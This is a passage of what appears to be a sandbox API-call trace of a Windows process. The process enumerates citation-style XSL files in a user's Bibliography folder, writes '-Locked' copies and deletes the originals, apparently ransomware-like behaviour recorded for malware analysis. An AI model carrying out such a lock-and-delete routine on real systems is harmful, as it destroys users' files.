lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eabbab, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eabbab, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a6d16e8, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x4197e, dwReserved0=0x0, dwReserved1=0x0, cFileName="GB.XSL", cAlternateFileName="")) returned 1 [0309.213] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eaf650, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eaf650, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a638a82, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3e966, dwReserved0=0x0, dwReserved1=0x0, cFileName="GostName.XSL", cAlternateFileName="")) returned 1 [0309.213] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eb319b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eb319b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a638a82, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3d639, dwReserved0=0x0, dwReserved1=0x0, cFileName="GostTitle.XSL", cAlternateFileName="GOSTTI~1.XSL")) returned 1 [0309.213] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eb804f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eb804f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a7ecfbc, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x45882, dwReserved0=0x0, dwReserved1=0x0, cFileName="HarvardAnglia2008OfficeOnline.xsl", cAlternateFileName="HARVAR~1.XSL")) returned 1 [0309.214] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ebb9a1, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ebb9a1, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x47e7d, dwReserved0=0x0, dwReserved1=0x0, cFileName="IEEE2006OfficeOnline.xsl", cAlternateFileName="IEEE20~1.XSL")) returned 1 [0309.214] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ec07b6, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ec07b6, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x42132, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISO690.XSL", cAlternateFileName="")) returned 1 [0309.214] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ec4265, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ec4265, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x351ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISO690Nmerical.XSL", cAlternateFileName="ISO690~1.XSL")) returned 1 [0309.214] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ecb8b4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ecb8b4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3e4f3, dwReserved0=0x0, dwReserved1=0x0, cFileName="MLASeventhEditionOfficeOnline.xsl", cAlternateFileName="MLASEV~1.XSL")) returned 1 [0309.214] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ed06d2, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ed06d2, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5b432832, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3d5c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="SIST02.XSL", cAlternateFileName="")) returned 1 [0309.214] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ed2ca5, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ed2ca5, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5b500917, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x54256, dwReserved0=0x0, dwReserved1=0x0, cFileName="TURABIAN.XSL", cAlternateFileName="")) returned 1 [0309.215] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0309.215] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0309.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0b8) returned 1 [0309.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c4) returned 1 [0309.216] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0f8) returned 1 [0309.216] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style", nBufferLength=0x105, lpBuffer=0x1aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style", lpFilePart=0x0) returned 0x42 [0309.216] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", nBufferLength=0x105, lpBuffer=0x1aebd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpFilePart=0x0) returned 0x43 [0309.217] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*", lpFindFileData=0x1aee20 | out: lpFindFileData=0x1aee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e9aa3d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9aa3d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80ed2ca5, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.218] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e9aa3d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9aa3d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80ed2ca5, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0309.218] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80e9e60e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9e60e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a58ff51, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x51722, dwReserved0=0x0, dwReserved1=0x0, cFileName="APASixthEditionOfficeOnline.xsl", cAlternateFileName="APASIX~1.XSL")) returned 1 [0309.218] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ea6d97, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ea6d97, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a638a82, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x48839, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHICAGO.XSL", cAlternateFileName="")) returned 1 [0309.219] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eabbab, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eabbab, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a6d16e8, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x4197e, dwReserved0=0x0, dwReserved1=0x0, cFileName="GB.XSL", cAlternateFileName="")) returned 1 [0309.219] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eaf650, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eaf650, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a638a82, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3e966, dwReserved0=0x0, dwReserved1=0x0, cFileName="GostName.XSL", cAlternateFileName="")) returned 1 [0309.219] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eb319b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eb319b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a638a82, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3d639, dwReserved0=0x0, dwReserved1=0x0, cFileName="GostTitle.XSL", cAlternateFileName="GOSTTI~1.XSL")) returned 1 [0309.220] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eb804f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eb804f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a7ecfbc, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x45882, dwReserved0=0x0, dwReserved1=0x0, cFileName="HarvardAnglia2008OfficeOnline.xsl", cAlternateFileName="HARVAR~1.XSL")) returned 1 [0309.220] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ebb9a1, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ebb9a1, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x47e7d, dwReserved0=0x0, dwReserved1=0x0, cFileName="IEEE2006OfficeOnline.xsl", cAlternateFileName="IEEE20~1.XSL")) returned 1 [0309.220] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ec07b6, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ec07b6, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x42132, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISO690.XSL", cAlternateFileName="")) returned 1 [0309.220] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ec4265, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ec4265, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x351ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISO690Nmerical.XSL", cAlternateFileName="ISO690~1.XSL")) returned 1 [0309.220] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ecb8b4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ecb8b4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3e4f3, dwReserved0=0x0, dwReserved1=0x0, cFileName="MLASeventhEditionOfficeOnline.xsl", cAlternateFileName="MLASEV~1.XSL")) returned 1 [0309.221] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ed06d2, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ed06d2, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5b432832, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3d5c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="SIST02.XSL", cAlternateFileName="")) returned 1 [0309.221] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ed2ca5, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ed2ca5, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5b500917, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x54256, dwReserved0=0x0, dwReserved1=0x0, cFileName="TURABIAN.XSL", cAlternateFileName="")) returned 1 [0309.221] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ed2ca5, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ed2ca5, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5b500917, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x54256, dwReserved0=0x0, dwReserved1=0x0, cFileName="TURABIAN.XSL", cAlternateFileName="")) returned 0 [0309.221] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0309.223] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0b8) returned 1 [0309.223] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c4) returned 1 [0309.223] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl-Locked", nBufferLength=0x105, lpBuffer=0x1aeab0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl-Locked", lpFilePart=0x0) returned 0x69 [0309.223] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefa4) returned 1 [0309.223] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\apasixtheditionofficeonline.xsl-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x484 [0309.225] GetFileType (hFile=0x484) returned 0x1 [0309.225] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefa0) returned 1 [0309.225] GetFileType (hFile=0x484) returned 0x1 [0309.227] CloseHandle (hObject=0x484) returned 1 [0309.227] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl", nBufferLength=0x105, lpBuffer=0x1aec30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl", lpFilePart=0x0) returned 0x62 [0309.227] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\apasixtheditionofficeonline.xsl")) returned 1 [0309.229] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL-Locked", nBufferLength=0x105, lpBuffer=0x1aeab0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL-Locked", lpFilePart=0x0) returned 0x55 [0309.229] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefa4) returned 1 [0309.229] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\chicago.xsl-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x484 [0309.229] GetFileType (hFile=0x484) returned 0x1 [0309.229] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefa0) returned 1 [0309.230] GetFileType (hFile=0x484) returned 0x1 [0309.233] CloseHandle (hObject=0x484) returned 1 [0309.233] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL", nBufferLength=0x105, lpBuffer=0x1aec30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL", lpFilePart=0x0) returned 0x4e [0309.233] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\chicago.xsl")) returned 1 [0309.295] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL-Locked", nBufferLength=0x105, lpBuffer=0x1aeab0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL-Locked", lpFilePart=0x0) returned 0x50 [0309.295] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefa4) returned 1 [0309.295] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\gb.xsl-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x484 [0309.296] GetFileType (hFile=0x484) returned 0x1 [0309.296] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefa0) returned 1 [0309.296] GetFileType (hFile=0x484) returned 0x1 [0309.297] CloseHandle (hObject=0x484) returned 1 [0309.298] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL", nBufferLength=0x105, lpBuffer=0x1aec30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL", lpFilePart=0x0) returned 0x49 [0309.298] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\gb.xsl")) returned 1 [0309.299] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL-Locked", nBufferLength=0x105, lpBuffer=0x1aeab0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL-Locked", lpFilePart=0x0) returned 0x56 [0309.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefa4) returned 1 [0309.299] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\gostname.xsl-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x484 [0309.299] GetFileType (hFile=0x484) returned 0x1 [0309.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefa0) returned 1 [0309.299] GetFileType (hFile=0x484) returned 0x1 [0309.301] CloseHandle (hObject=0x484) returned 1 [0309.301] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL", nBufferLength=0x105, lpBuffer=0x1aec30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL", lpFilePart=0x0) returned 0x4f [0309.301] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\gostname.xsl")) returned 1 [0309.302] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL-Locked", nBufferLength=0x105, lpBuffer=0x1aeab0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL-Locked", lpFilePart=0x0) returned 0x57 [0309.302] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefa4) returned 1 [0309.302] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\gosttitle.xsl-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x484 [0309.303] GetFileType (hFile=0x484) returned 0x1 [0309.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefa0) returned 1 [0309.303] GetFileType (hFile=0x484) returned 0x1 [0309.304] CloseHandle (hObject=0x484) returned 1 [0309.305] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL", nBufferLength=0x105, lpBuffer=0x1aec30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL", lpFilePart=0x0) returned 0x50 [0309.305] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\gosttitle.xsl")) returned 1 [0309.306] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl-Locked", nBufferLength=0x105, lpBuffer=0x1aeab0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl-Locked", lpFilePart=0x0) returned 0x6b [0309.306] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefa4) returned 1 [0309.306] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\harvardanglia2008officeonline.xsl-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x484 [0309.306] GetFileType (hFile=0x484) returned 0x1 [0309.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefa0) returned 1 [0309.306] GetFileType (hFile=0x484) returned 0x1 [0309.308] CloseHandle (hObject=0x484) returned 1 [0309.309] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl", nBufferLength=0x105, lpBuffer=0x1aec30, lpFilePart=0x0 | out: 